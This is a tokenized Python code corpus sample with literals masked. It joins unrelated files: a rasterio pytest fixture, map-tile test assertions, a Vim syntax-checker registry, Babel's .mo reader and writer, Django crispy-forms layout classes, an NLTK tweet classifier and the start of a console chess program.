<s> import functools <EOL> import operator <EOL> import os <EOL> import shutil <EOL> import sys <EOL> import py <EOL> import pytest <EOL> import rasterio <EOL> if sys . version_info > ( <NUM_LIT:3> , ) : <EOL> reduce = functools . reduce <EOL> test_files = [ <EOL> os . path . join ( os . path . dirname ( __file__ ) , p ) for p in [ '<STR_LIT>' ] ] <EOL> def pytest_cmdline_main ( config ) : <EOL> if reduce ( operator . and_ , map ( os . path . exists , test_files ) ) : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def data ( ) : <EOL> """<STR_LIT>""" <EOL> tmpdir = py . test . ensuretemp ( '<STR_LIT>' ) <EOL> for filename in test_files : <EOL> shutil . copy ( filename , str ( tmpdir ) ) <EOL> return tmpdir </s>
<s> assert_has_feature ( <EOL> <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : <NUM_LIT> } ) <EOL> assert_has_feature ( <EOL> <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : <NUM_LIT> } ) <EOL> assert_has_feature ( <EOL> <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : <NUM_LIT> } ) </s>
<s> assert_has_feature ( <EOL> <NUM_LIT:8> , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert_has_feature ( <EOL> <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert_has_feature ( <EOL> <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) </s>
<s> assert_has_feature ( <EOL> <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert_has_feature ( <EOL> <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) </s>
<s> assert_has_feature ( <EOL> <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , "<STR_LIT>" , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:id>" : <NUM_LIT> } ) <EOL> assert_has_feature ( <EOL> <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT> , "<STR_LIT>" , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:id>" : <NUM_LIT> } ) </s>
<s> from __future__ import absolute_import <EOL> import collections <EOL> import importlib <EOL> import shlex <EOL> import subprocess <EOL> import os <EOL> import os . path <EOL> import re <EOL> from . utils import logging , exe_exist <EOL> class Meta ( type ) : <EOL> def __init__ ( cls , name , bases , attrs ) : <EOL> if name not in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> SyntaxChecker . registry [ cls . __filetype__ ] [ cls . checker ] = cls <EOL> return super ( Meta , cls ) . __init__ ( name , bases , attrs ) <EOL> Base = Meta ( "<STR_LIT>" , ( object , ) , { } ) <EOL> class SyntaxChecker ( Base ) : <EOL> registry = collections . defaultdict ( dict ) <EOL> errorformat = None <EOL> checker = None <EOL> args = '<STR_LIT>' <EOL> _regex_map = { } <EOL> def __getitem__ ( self , ft ) : <EOL> return self . registry . get ( ft , { } ) <EOL> def __contains__ ( self , ft ) : <EOL> return ft in self . registry <EOL> @ classmethod <EOL> def parse_loclist ( cls , loclist , bufnr ) : <EOL> if cls . checker not in cls . _regex_map : <EOL> cls . _regex_map [ cls . checker ] = re . compile ( cls . regex , re . VERBOSE ) <EOL> lists = [ ] <EOL> for i , l in enumerate ( loclist ) : <EOL> g = cls . _regex_map [ cls . checker ] . match ( l ) <EOL> if not g : <EOL> continue <EOL> loc = g . groupdict ( ) <EOL> loc . update ( { <EOL> "<STR_LIT>" : i + <NUM_LIT:1> , <EOL> "<STR_LIT>" : bufnr , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT:type>" : '<STR_LIT>' if loc [ "<STR_LIT>" ] else '<STR_LIT:E>' <EOL> } ) <EOL> lists . append ( loc ) <EOL> return lists <EOL> @ classmethod <EOL> def gen_loclist ( cls , fpath , bufnr ) : <EOL> if not cls . filter_file ( fpath ) : <EOL> return [ ] <EOL> if not exe_exist ( cls . checker ) : <EOL> logging . warn ( "<STR_LIT>" . format ( cls . checker ) ) <EOL> return [ ] <EOL> if not os . path . exists ( fpath ) : <EOL> logging . warn ( "<STR_LIT>" . format ( fpath ) ) <EOL> return [ ] <EOL> cmd_args = shlex . split ( cls . cmd ( os . path . basename ( fpath ) ) ) <EOL> res = subprocess . Popen ( cmd_args , cwd = os . path . dirname ( fpath ) , <EOL> stdout = subprocess . PIPE , stderr = subprocess . PIPE , <EOL> close_fds = True ) <EOL> out = res . communicate ( ) <EOL> err_lines = '<STR_LIT:\n>' . join ( out ) . strip ( ) . replace ( '<STR_LIT:\r>' , '<STR_LIT>' ) . split ( '<STR_LIT:\n>' ) <EOL> loclists = cls . parse_loclist ( err_lines , bufnr ) <EOL> return loclists <EOL> @ classmethod <EOL> def filter_file ( cls , fpath ) : <EOL> return True <EOL> @ classmethod <EOL> def cmd ( cls , fname ) : <EOL> return "<STR_LIT>" . format ( cls . checker , cls . args , fname ) <EOL> checker_manager = SyntaxChecker ( ) <EOL> def load_checkers ( ft ) : <EOL> if ft not in checker_manager : <EOL> try : <EOL> importlib . import_module ( "<STR_LIT>" . format ( ft ) ) <EOL> except ImportError : <EOL> return { } <EOL> return checker_manager [ ft ] </s>
<s> """<STR_LIT>""" <EOL> import array <EOL> import struct <EOL> from babel . messages . catalog import Catalog , Message <EOL> from babel . _compat import range_type , array_tobytes <EOL> LE_MAGIC = <NUM_LIT> <EOL> BE_MAGIC = <NUM_LIT> <EOL> def read_mo ( fileobj ) : <EOL> """<STR_LIT>""" <EOL> catalog = Catalog ( ) <EOL> headers = { } <EOL> filename = getattr ( fileobj , '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> buf = fileobj . read ( ) <EOL> buflen = len ( buf ) <EOL> unpack = struct . unpack <EOL> magic = unpack ( '<STR_LIT>' , buf [ : <NUM_LIT:4> ] ) [ <NUM_LIT:0> ] <EOL> if magic == LE_MAGIC : <EOL> version , msgcount , origidx , transidx = unpack ( '<STR_LIT>' , buf [ <NUM_LIT:4> : <NUM_LIT:20> ] ) <EOL> ii = '<STR_LIT>' <EOL> elif magic == BE_MAGIC : <EOL> version , msgcount , origidx , transidx = unpack ( '<STR_LIT>' , buf [ <NUM_LIT:4> : <NUM_LIT:20> ] ) <EOL> ii = '<STR_LIT>' <EOL> else : <EOL> raise IOError ( <NUM_LIT:0> , '<STR_LIT>' , filename ) <EOL> for i in range_type ( <NUM_LIT:0> , msgcount ) : <EOL> mlen , moff = unpack ( ii , buf [ origidx : origidx + <NUM_LIT:8> ] ) <EOL> mend = moff + mlen <EOL> tlen , toff = unpack ( ii , buf [ transidx : transidx + <NUM_LIT:8> ] ) <EOL> tend = toff + tlen <EOL> if mend < buflen and tend < buflen : <EOL> msg = buf [ moff : mend ] <EOL> tmsg = buf [ toff : tend ] <EOL> else : <EOL> raise IOError ( <NUM_LIT:0> , '<STR_LIT>' , filename ) <EOL> if mlen == <NUM_LIT:0> : <EOL> lastkey = key = None <EOL> for item in tmsg . splitlines ( ) : <EOL> item = item . strip ( ) <EOL> if not item : <EOL> continue <EOL> if b'<STR_LIT::>' in item : <EOL> key , value = item . split ( b'<STR_LIT::>' , <NUM_LIT:1> ) <EOL> lastkey = key = key . strip ( ) . lower ( ) <EOL> headers [ key ] = value . strip ( ) <EOL> elif lastkey : <EOL> headers [ lastkey ] += b'<STR_LIT:\n>' + item <EOL> if b'<STR_LIT>' in msg : <EOL> ctxt , msg = msg . split ( b'<STR_LIT>' ) <EOL> else : <EOL> ctxt = None <EOL> if b'<STR_LIT:\x00>' in msg : <EOL> msg = msg . split ( b'<STR_LIT:\x00>' ) <EOL> tmsg = tmsg . split ( b'<STR_LIT:\x00>' ) <EOL> if catalog . charset : <EOL> msg = [ x . decode ( catalog . charset ) for x in msg ] <EOL> tmsg = [ x . decode ( catalog . charset ) for x in tmsg ] <EOL> else : <EOL> if catalog . charset : <EOL> msg = msg . decode ( catalog . charset ) <EOL> tmsg = tmsg . decode ( catalog . charset ) <EOL> catalog [ msg ] = Message ( msg , tmsg , context = ctxt ) <EOL> origidx += <NUM_LIT:8> <EOL> transidx += <NUM_LIT:8> <EOL> catalog . mime_headers = headers . items ( ) <EOL> return catalog <EOL> def write_mo ( fileobj , catalog , use_fuzzy = False ) : <EOL> """<STR_LIT>""" <EOL> messages = list ( catalog ) <EOL> if not use_fuzzy : <EOL> messages [ <NUM_LIT:1> : ] = [ m for m in messages [ <NUM_LIT:1> : ] if not m . fuzzy ] <EOL> messages . sort ( ) <EOL> ids = strs = b'<STR_LIT>' <EOL> offsets = [ ] <EOL> for message in messages : <EOL> if message . pluralizable : <EOL> msgid = b'<STR_LIT:\x00>' . join ( [ <EOL> msgid . encode ( catalog . charset ) for msgid in message . id <EOL> ] ) <EOL> msgstrs = [ ] <EOL> for idx , string in enumerate ( message . string ) : <EOL> if not string : <EOL> msgstrs . append ( message . id [ min ( int ( idx ) , <NUM_LIT:1> ) ] ) <EOL> else : <EOL> msgstrs . append ( string ) <EOL> msgstr = b'<STR_LIT:\x00>' . join ( [ <EOL> msgstr . encode ( catalog . charset ) for msgstr in msgstrs <EOL> ] ) <EOL> else : <EOL> msgid = message . id . encode ( catalog . charset ) <EOL> if not message . string : <EOL> msgstr = message . id . encode ( catalog . charset ) <EOL> else : <EOL> msgstr = message . string . encode ( catalog . charset ) <EOL> if message . context : <EOL> msgid = b'<STR_LIT>' . join ( [ message . context . encode ( catalog . charset ) , <EOL> msgid ] ) <EOL> offsets . append ( ( len ( ids ) , len ( msgid ) , len ( strs ) , len ( msgstr ) ) ) <EOL> ids += msgid + b'<STR_LIT:\x00>' <EOL> strs += msgstr + b'<STR_LIT:\x00>' <EOL> keystart = <NUM_LIT:7> * <NUM_LIT:4> + <NUM_LIT:16> * len ( messages ) <EOL> valuestart = keystart + len ( ids ) <EOL> koffsets = [ ] <EOL> voffsets = [ ] <EOL> for o1 , l1 , o2 , l2 in offsets : <EOL> koffsets += [ l1 , o1 + keystart ] <EOL> voffsets += [ l2 , o2 + valuestart ] <EOL> offsets = koffsets + voffsets <EOL> fileobj . write ( struct . pack ( '<STR_LIT>' , <EOL> LE_MAGIC , <EOL> <NUM_LIT:0> , <EOL> len ( messages ) , <EOL> <NUM_LIT:7> * <NUM_LIT:4> , <EOL> <NUM_LIT:7> * <NUM_LIT:4> + len ( messages ) * <NUM_LIT:8> , <EOL> <NUM_LIT:0> , <NUM_LIT:0> <EOL> ) + array_tobytes ( array . array ( "<STR_LIT:i>" , offsets ) ) + ids + strs ) </s>
<s> from __future__ import unicode_literals <EOL> from random import randint <EOL> from django . template import Template <EOL> from django . template . loader import render_to_string <EOL> from django . template . defaultfilters import slugify <EOL> from . compatibility import text_type <EOL> from . layout import LayoutObject , Field , Div <EOL> from . utils import render_field , flatatt , TEMPLATE_PACK <EOL> class PrependedAppendedText ( Field ) : <EOL> template = "<STR_LIT>" <EOL> def __init__ ( self , field , prepended_text = None , appended_text = None , * args , ** kwargs ) : <EOL> self . field = field <EOL> self . appended_text = appended_text <EOL> self . prepended_text = prepended_text <EOL> if '<STR_LIT>' in kwargs : <EOL> self . active = kwargs . pop ( '<STR_LIT>' ) <EOL> self . input_size = None <EOL> css_class = kwargs . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in css_class : <EOL> self . input_size = '<STR_LIT>' <EOL> if '<STR_LIT>' in css_class : <EOL> self . input_size = '<STR_LIT>' <EOL> super ( PrependedAppendedText , self ) . __init__ ( field , * args , ** kwargs ) <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , extra_context = None , ** kwargs ) : <EOL> extra_context = { <EOL> '<STR_LIT>' : self . appended_text , <EOL> '<STR_LIT>' : self . prepended_text , <EOL> '<STR_LIT>' : self . input_size , <EOL> '<STR_LIT>' : getattr ( self , "<STR_LIT>" , False ) <EOL> } <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> extra_context [ '<STR_LIT>' ] = self . wrapper_class <EOL> template = self . get_template_name ( template_pack ) <EOL> return render_field ( <EOL> self . field , form , form_style , context , <EOL> template = template , attrs = self . attrs , <EOL> template_pack = template_pack , extra_context = extra_context , ** kwargs <EOL> ) <EOL> class AppendedText ( PrependedAppendedText ) : <EOL> def __init__ ( self , field , text , * args , ** kwargs ) : <EOL> kwargs . pop ( '<STR_LIT>' , None ) <EOL> kwargs . pop ( '<STR_LIT>' , None ) <EOL> self . text = text <EOL> super ( AppendedText , self ) . __init__ ( field , appended_text = text , ** kwargs ) <EOL> class PrependedText ( PrependedAppendedText ) : <EOL> def __init__ ( self , field , text , * args , ** kwargs ) : <EOL> kwargs . pop ( '<STR_LIT>' , None ) <EOL> kwargs . pop ( '<STR_LIT>' , None ) <EOL> self . text = text <EOL> super ( PrependedText , self ) . __init__ ( field , prepended_text = text , ** kwargs ) <EOL> class FormActions ( LayoutObject ) : <EOL> """<STR_LIT>""" <EOL> template = "<STR_LIT>" <EOL> def __init__ ( self , * fields , ** kwargs ) : <EOL> self . fields = list ( fields ) <EOL> self . template = kwargs . pop ( '<STR_LIT>' , self . template ) <EOL> self . attrs = kwargs <EOL> if '<STR_LIT>' in self . attrs : <EOL> self . attrs [ '<STR_LIT:class>' ] = self . attrs . pop ( '<STR_LIT>' ) <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> html = self . get_rendered_fields ( form , form_style , context , template_pack , ** kwargs ) <EOL> template = self . get_template_name ( template_pack ) <EOL> context . update ( { <EOL> '<STR_LIT>' : self , <EOL> '<STR_LIT>' : html <EOL> } ) <EOL> return render_to_string ( template , context . flatten ( ) ) <EOL> def flat_attrs ( self ) : <EOL> return flatatt ( self . attrs ) <EOL> class InlineCheckboxes ( Field ) : <EOL> """<STR_LIT>""" <EOL> template = "<STR_LIT>" <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> return super ( InlineCheckboxes , self ) . render ( <EOL> form , form_style , context , template_pack = template_pack , <EOL> extra_context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> class InlineRadios ( Field ) : <EOL> """<STR_LIT>""" <EOL> template = "<STR_LIT>" <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> return super ( InlineRadios , self ) . render ( <EOL> form , form_style , context , template_pack = template_pack , <EOL> extra_context = { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> class FieldWithButtons ( Div ) : <EOL> template = '<STR_LIT>' <EOL> field_template = '<STR_LIT>' <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , extra_context = None , ** kwargs ) : <EOL> field_template = self . field_template % template_pack <EOL> buttons = '<STR_LIT>' . join ( <EOL> render_field ( <EOL> field , form , form_style , context , <EOL> field_template , layout_object = self , <EOL> template_pack = template_pack , ** kwargs <EOL> ) for field in self . fields [ <NUM_LIT:1> : ] <EOL> ) <EOL> extra_context = { '<STR_LIT>' : self , '<STR_LIT>' : buttons } <EOL> template = self . get_template_name ( template_pack ) <EOL> if isinstance ( self . fields [ <NUM_LIT:0> ] , Field ) : <EOL> return render_field ( <EOL> self . fields [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , form , form_style , context , <EOL> template , attrs = self . fields [ <NUM_LIT:0> ] . attrs , <EOL> template_pack = template_pack , extra_context = extra_context , ** kwargs <EOL> ) <EOL> else : <EOL> return render_field ( <EOL> self . fields [ <NUM_LIT:0> ] , form , form_style , context , template , <EOL> extra_context = extra_context , ** kwargs <EOL> ) <EOL> class StrictButton ( object ) : <EOL> """<STR_LIT>""" <EOL> template = '<STR_LIT>' <EOL> field_classes = '<STR_LIT>' <EOL> def __init__ ( self , content , ** kwargs ) : <EOL> self . content = content <EOL> self . template = kwargs . pop ( '<STR_LIT>' , self . template ) <EOL> kwargs . setdefault ( '<STR_LIT:type>' , '<STR_LIT>' ) <EOL> if '<STR_LIT>' in kwargs : <EOL> kwargs [ '<STR_LIT:id>' ] = kwargs . pop ( '<STR_LIT>' ) <EOL> kwargs [ '<STR_LIT:class>' ] = self . field_classes <EOL> if '<STR_LIT>' in kwargs : <EOL> kwargs [ '<STR_LIT:class>' ] += "<STR_LIT>" % kwargs . pop ( '<STR_LIT>' ) <EOL> self . flat_attrs = flatatt ( kwargs ) <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> self . content = Template ( text_type ( self . content ) ) . render ( context ) <EOL> template = self . template % template_pack <EOL> context . update ( { '<STR_LIT>' : self } ) <EOL> return render_to_string ( template , context . flatten ( ) ) <EOL> class Container ( Div ) : <EOL> """<STR_LIT>""" <EOL> css_class = "<STR_LIT>" <EOL> def __init__ ( self , name , * fields , ** kwargs ) : <EOL> super ( Container , self ) . __init__ ( * fields , ** kwargs ) <EOL> self . template = kwargs . pop ( '<STR_LIT>' , self . template ) <EOL> self . name = name <EOL> self . _active_originally_included = "<STR_LIT>" in kwargs <EOL> self . active = kwargs . pop ( "<STR_LIT>" , False ) <EOL> if not self . css_id : <EOL> self . css_id = slugify ( self . name ) <EOL> def __contains__ ( self , field_name ) : <EOL> """<STR_LIT>""" <EOL> return field_name in map ( lambda pointer : pointer [ <NUM_LIT:1> ] , self . get_field_names ( ) ) <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> if self . active : <EOL> if not '<STR_LIT>' in self . css_class : <EOL> self . css_class += '<STR_LIT>' <EOL> else : <EOL> self . css_class = self . css_class . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return super ( Container , self ) . render ( form , form_style , context , template_pack ) <EOL> class ContainerHolder ( Div ) : <EOL> """<STR_LIT>""" <EOL> def first_container_with_errors ( self , errors ) : <EOL> """<STR_LIT>""" <EOL> for tab in self . fields : <EOL> errors_here = any ( error in tab for error in errors ) <EOL> if errors_here : <EOL> return tab <EOL> return None <EOL> def open_target_group_for_form ( self , form ) : <EOL> """<STR_LIT>""" <EOL> target = self . first_container_with_errors ( form . errors . keys ( ) ) <EOL> if target is None : <EOL> target = self . fields [ <NUM_LIT:0> ] <EOL> if not target . _active_originally_included : <EOL> target . active = True <EOL> return target <EOL> target . active = True <EOL> return target <EOL> class Tab ( Container ) : <EOL> """<STR_LIT>""" <EOL> css_class = '<STR_LIT>' <EOL> link_template = '<STR_LIT>' <EOL> def render_link ( self , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> link_template = self . link_template % template_pack <EOL> return render_to_string ( link_template , { '<STR_LIT>' : self } ) <EOL> class TabHolder ( ContainerHolder ) : <EOL> """<STR_LIT>""" <EOL> template = '<STR_LIT>' <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> for tab in self . fields : <EOL> tab . active = False <EOL> self . open_target_group_for_form ( form ) <EOL> content = self . get_rendered_fields ( form , form_style , context , template_pack ) <EOL> links = '<STR_LIT>' . join ( tab . render_link ( template_pack ) for tab in self . fields ) <EOL> context . update ( { <EOL> '<STR_LIT>' : self , <EOL> '<STR_LIT>' : links , <EOL> '<STR_LIT:content>' : content <EOL> } ) <EOL> template = self . get_template_name ( template_pack ) <EOL> return render_to_string ( template , context . flatten ( ) ) <EOL> class AccordionGroup ( Container ) : <EOL> """<STR_LIT>""" <EOL> template = "<STR_LIT>" <EOL> data_parent = "<STR_LIT>" <EOL> class Accordion ( ContainerHolder ) : <EOL> """<STR_LIT>""" <EOL> template = "<STR_LIT>" <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> content = '<STR_LIT>' <EOL> if not self . css_id : <EOL> self . css_id = "<STR_LIT:->" . join ( [ "<STR_LIT>" , text_type ( randint ( <NUM_LIT:1000> , <NUM_LIT> ) ) ] ) <EOL> self . open_target_group_for_form ( form ) <EOL> for group in self . fields : <EOL> group . data_parent = self . css_id <EOL> content += render_field ( <EOL> group , form , form_style , context , template_pack = template_pack , ** kwargs <EOL> ) <EOL> template = self . get_template_name ( template_pack ) <EOL> context . update ( { '<STR_LIT>' : self , '<STR_LIT:content>' : content } ) <EOL> return render_to_string ( template , context . flatten ( ) ) <EOL> class Alert ( Div ) : <EOL> """<STR_LIT>""" <EOL> template = "<STR_LIT>" <EOL> css_class = "<STR_LIT>" <EOL> def __init__ ( self , content , dismiss = True , block = False , ** kwargs ) : <EOL> fields = [ ] <EOL> if block : <EOL> self . css_class += '<STR_LIT>' <EOL> Div . __init__ ( self , * fields , ** kwargs ) <EOL> self . template = kwargs . pop ( '<STR_LIT>' , self . template ) <EOL> self . content = content <EOL> self . dismiss = dismiss <EOL> def render ( self , form , form_style , context , template_pack = TEMPLATE_PACK , ** kwargs ) : <EOL> template = self . get_template_name ( template_pack ) <EOL> context . update ( { '<STR_LIT>' : self , '<STR_LIT:content>' : self . content , '<STR_LIT>' : self . dismiss } ) <EOL> return render_to_string ( template , context . flatten ( ) ) <EOL> class UneditableField ( Field ) : <EOL> """<STR_LIT>""" <EOL> template = "<STR_LIT>" <EOL> def __init__ ( self , field , * args , ** kwargs ) : <EOL> self . attrs = { '<STR_LIT:class>' : '<STR_LIT>' } <EOL> super ( UneditableField , self ) . __init__ ( field , * args , ** kwargs ) <EOL> class InlineField ( Field ) : <EOL> template = "<STR_LIT>" </s>
<s> import sys , os <EOL> import imp <EOL> from optparse import make_option <EOL> from django . conf import settings <EOL> from django . utils . importlib import import_module <EOL> from django . core . management import call_command <EOL> from django . core . management import BaseCommand <EOL> from django . db import connections <EOL> def import_app ( app_label , verbosity ) : <EOL> try : <EOL> app_path = __import__ ( app_label , { } , { } , [ app_label . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] ] ) . __path__ <EOL> except AttributeError : <EOL> return <EOL> except ImportError : <EOL> print "<STR_LIT>" % app_label <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> imp . find_module ( '<STR_LIT>' , app_path ) <EOL> except ImportError : <EOL> return <EOL> if verbosity >= <NUM_LIT:1> : <EOL> sys . stderr . write ( '<STR_LIT>' % app_label ) <EOL> generator = import_module ( '<STR_LIT>' , app_label ) <EOL> class Command ( BaseCommand ) : <EOL> option_list = BaseCommand . option_list + ( <EOL> make_option ( "<STR_LIT>" , action = '<STR_LIT:store_true>' , dest = "<STR_LIT>" , default = False , <EOL> help = "<STR_LIT>" ) , <EOL> ) <EOL> help = '<STR_LIT>' <EOL> args = '<STR_LIT>' <EOL> def handle ( self , * app_labels , ** options ) : <EOL> verbosity = int ( options . pop ( '<STR_LIT>' , <NUM_LIT:1> ) ) <EOL> fixture = options . pop ( '<STR_LIT>' ) <EOL> if len ( app_labels ) == <NUM_LIT:0> : <EOL> for app_label in settings . INSTALLED_APPS : <EOL> import_app ( app_label , verbosity ) <EOL> else : <EOL> for app_label in app_labels : <EOL> import_app ( app_label , verbosity ) <EOL> if fixture : <EOL> for alias in connections . _connections : <EOL> call_command ( "<STR_LIT>" , <EOL> '<STR_LIT>' , <EOL> ** dict ( options , verbosity = <NUM_LIT:0> , database = alias ) ) </s>
<s> from django . conf import settings <EOL> def get_consumer_credentials ( ) : <EOL> '''<STR_LIT>''' <EOL> return getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) , getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) , getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> from docs import DocumentationGenerator <EOL> from django . shortcuts import render_to_response <EOL> from django . template . context import RequestContext <EOL> def documentation ( request , * args , ** kwargs ) : <EOL> docs = DocumentationGenerator ( ) . get_docs ( as_objects = True ) <EOL> return render_to_response ( "<STR_LIT>" , { '<STR_LIT>' : docs } , <EOL> context_instance = RequestContext ( request ) ) </s>
<s> from django . conf . urls . defaults import * <EOL> from django . contrib import admin <EOL> admin . autodiscover ( ) <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , '<STR_LIT:index>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) </s>
<s> from nltk . classify import NaiveBayesClassifier <EOL> from nltk . corpus import movie_reviews , stopwords <EOL> from nltk . collocations import BigramCollocationFinder <EOL> from nltk . metrics import BigramAssocMeasures <EOL> from nltk . probability import FreqDist , ConditionalFreqDist <EOL> import gzip <EOL> import os <EOL> import pickle <EOL> import re <EOL> import nltk <EOL> POSITIVE = "<STR_LIT:4>" <EOL> NEGATIVE = "<STR_LIT:0>" <EOL> NEUTRAL = "<STR_LIT:2>" <EOL> mention_re = re . compile ( ur "<STR_LIT>" , re . UNICODE ) <EOL> url_re = re . compile ( ur "<STR_LIT>" , re . UNICODE ) <EOL> emoticon_re = re . compile ( ur "<STR_LIT>" , re . UNICODE ) <EOL> tokenizer = nltk . RegexpTokenizer ( r'<STR_LIT>' ) <EOL> def word_feats ( words ) : <EOL> return dict ( [ ( word , True ) for word in words ] ) <EOL> def words_in_tweet ( inputstr ) : <EOL> outputstr = inputstr <EOL> outputstr = mention_re . sub ( "<STR_LIT>" , outputstr ) <EOL> outputstr = url_re . sub ( "<STR_LIT>" , outputstr ) <EOL> outputstr = emoticon_re . sub ( "<STR_LIT>" , outputstr ) <EOL> outputstr = outputstr . lower ( ) <EOL> return tokenizer . tokenize ( outputstr ) <EOL> def save_classifier ( classifier ) : <EOL> fModel = open ( '<STR_LIT>' , "<STR_LIT:wb>" ) <EOL> pickle . dump ( classifier , fModel , <NUM_LIT:1> ) <EOL> fModel . close ( ) <EOL> os . system ( "<STR_LIT>" ) <EOL> os . system ( "<STR_LIT>" ) <EOL> def load_classifier ( ) : <EOL> os . system ( "<STR_LIT>" ) <EOL> fModel = open ( '<STR_LIT>' , "<STR_LIT:rb>" ) <EOL> classifier = pickle . load ( fModel ) <EOL> fModel . close ( ) <EOL> os . system ( "<STR_LIT>" ) <EOL> return classifier <EOL> def package_classifier ( to_pickle ) : <EOL> fp = gzip . open ( '<STR_LIT>' , '<STR_LIT:wb>' ) <EOL> pickle . dump ( to_pickle , fp , <NUM_LIT:1> ) <EOL> fp . close ( ) </s>
<s> from Board import Board <EOL> from Pawn import Pawn <EOL> from Rook import Rook <EOL> from King import King <EOL> from Queen import Queen <EOL> from Bishop import Bishop <EOL> from Knight import Knight <EOL> from Coordinate import Coordinate as C <EOL> from Move import Move <EOL> from Piece import Piece <EOL> from AI import AI <EOL> from InputParser import InputParser <EOL> import time <EOL> import random <EOL> import sys <EOL> WHITE = True <EOL> BLACK = False <EOL> def askForPlayerSide ( ) : <EOL> playerChoiceInput = input ( <EOL> "<STR_LIT>" ) . lower ( ) <EOL> if '<STR_LIT:w>' in playerChoiceInput : <EOL> print ( "<STR_LIT>" ) <EOL> return WHITE <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> return BLACK <EOL> def askForDepthOfAI ( ) : <EOL> depthInput = <NUM_LIT:2> <EOL> try : <EOL> depthInput = int ( input ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> except : <EOL> print ( "<STR_LIT>" ) <EOL> return depthInput <EOL> def printCommandOptions ( ) : <EOL> undoOption = '<STR_LIT>' <EOL> printLegalMovesOption = '<STR_LIT>' <EOL> randomMoveOption = '<STR_LIT>' <EOL> quitOption = '<STR_LIT>' <EOL> moveOption = '<STR_LIT>' <EOL> options = [ undoOption , printLegalMovesOption , randomMoveOption , <EOL> quitOption , moveOption , '<STR_LIT>' , ] <EOL> print ( '<STR_LIT:\n>' . join ( options ) ) <EOL> def printAllLegalMoves ( board , parser ) : <EOL> for move in parser . getLegalMovesWithShortNotation ( board . currentSide ) : <EOL> print ( move . notation ) <EOL> def getRandomMove ( board , parser ) : <EOL> legalMoves = board . getAllMovesLegal ( board . currentSide ) <EOL> randomMove = random . choice ( legalMoves ) <EOL> randomMove . notation = parser . notationForMove ( randomMove ) <EOL> return randomMove <EOL> def makeMove ( move , board ) : <EOL> print ( ) <EOL> print ( 